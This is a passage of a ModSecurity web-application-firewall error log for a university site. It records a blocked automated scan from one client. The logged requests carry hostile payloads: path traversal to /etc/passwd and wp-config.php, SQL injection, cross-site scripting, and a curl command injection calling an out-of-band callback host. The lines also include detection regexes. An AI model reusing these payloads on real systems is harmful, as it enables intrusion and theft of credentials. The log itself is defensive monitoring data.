"/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAXbb58AAAAL"]
[Tue Aug 29 11:38:34.476808 2023] [:error] [pid 1547] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAYLYbMAAAAQ"]
[Tue Aug 29 11:38:35.402135 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAARiDxwAAAAJ"]
[Tue Aug 29 11:38:46.423142 2023] [:error] [pid 1556] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYUOMwAAAAD"]
[Tue Aug 29 11:38:47.395913 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAXJ6g4AAAAX"]
[Tue Aug 29 11:38:47.396390 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYb5sEAAAAI"]
[Tue Aug 29 11:38:56.366538 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYMWK0AAAAR"]
[Tue Aug 29 11:38:57.359306 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAXwLLoAAAAe"]
[Tue Aug 29 11:38:57.363992 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYIYlAAAAAM"]
[Tue Aug 29 11:39:05.743636 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12acCo-f0AAAYh9S4AAAAK"]
[Tue Aug 29 11:39:07.303729 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAaXqooAAAAl"]
[Tue Aug 29 11:39:10.479654 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12bsCo-f0AAAYlCNsAAAAP"]
[Tue Aug 29 11:39:12.055392 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAYcur4AAAAN"]
[Tue Aug 29 11:39:12.244504 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAagExMAAAAn"]
[Tue Aug 29 11:39:13.346486 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAYcus0AAAAN"]
[Tue Aug 29 11:39:14.227670 2023] [:error] [pid 1684] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.49.154_e2c26210eef2959c589607531610a5759f8c78f1"): Internal error [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12cMCo-f0AAAaULdwAAAAh"]
[Tue Aug 29 11:39:18.669670 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAXA9pMAAAAO"]
[Tue Aug 29 11:39:23.563766 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAYcuvYAAAAN"]
[Tue Aug 29 11:39:36.440353 2023] [:error] [pid 1777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAbx29YAAAAQ"]
[Tue Aug 29 11:39:48.365593 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAagE4kAAAAn"]
[Tue Aug 29 11:39:56.483217 2023] [:error] [pid 1701] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAali1AAAAAs"]
[Tue Aug 29 11:40:02.497038 2023] [:error] [pid 1778] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26grst3omu7wpxpg.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAby8ZIAAAAN"]
[Tue Aug 29 11:40:06.456902 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO12psCo-f0AAAcjAgoAAAAw"]
[Tue Aug 29 11:40:07.380299 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAATZp7IAAAAf"]
[Tue Aug 29 11:40:07.400297 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAaXquMAAAAl"]
[Tue Aug 29 11:40:12.385918 2023] [:error] [pid 1793] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAcBbYEAAAAH"]
[Tue Aug 29 11:40:21.463035 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAV1EmMAAAAd"]
[Tue Aug 29 11:40:22.547253 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAaJJ4MAAAAJ"]
[Tue Aug 29 11:40:32.417713 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAcoNLwAAAAF"]
[Tue Aug 29 11:40:33.393048 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcjAjQAAAAw"]
[Tue Aug 29 11:40:36.524415 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAYMWRoAAAAR"]
[Tue Aug 29 11:40:37.415535 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAaJJ7QAAAAJ"]
[Tue Aug 29 11:40:39.364309 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAYf-HsAAAAD"]
[Tue Aug 29 11:40:40.383408 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAYf-IEAAAAD"]
[Tue Aug 29 11:40:44.579546 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAXbcOQAAAAL"]
[Tue Aug 29 11:40:44.619828 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 